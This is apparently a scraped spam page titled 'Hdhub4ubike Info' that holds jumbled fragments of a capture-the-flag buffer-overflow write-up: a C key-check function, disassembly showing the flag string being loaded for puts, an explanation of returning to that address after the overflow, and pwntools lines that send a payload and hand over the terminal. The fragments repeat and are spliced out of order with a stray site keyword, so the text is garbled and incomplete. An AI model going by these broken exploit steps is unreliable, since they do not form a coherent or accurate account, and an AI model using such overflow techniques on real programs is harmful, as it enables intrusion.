Hdhub4ubike Info

/* ---------------------------------------------------- */ int check_key(const char *key) // key must be exactly 0x30 bytes long if (strlen(key) != 0x30) return 0;

// compare with a secret stored in the .rodata section if (strcmp(key, secret_key) != 0) return 0; hdhub4ubike

0x0040119f: lea rdi, [rip+0x2000] ; address of the flag string 0x004011a6: call puts@plt 0x004011a6 is the (the call instruction itself). If we return to this address after the overflow, the program will execute the puts call with the correct argument already loaded (the lea instruction that loads the flag pointer into rdi is right before it). secret_key) != 0) return 0

p.sendline(payload.decode('latin-1')) # send as a line p.interact() # hand over the terminal 0x0040119f: lea rdi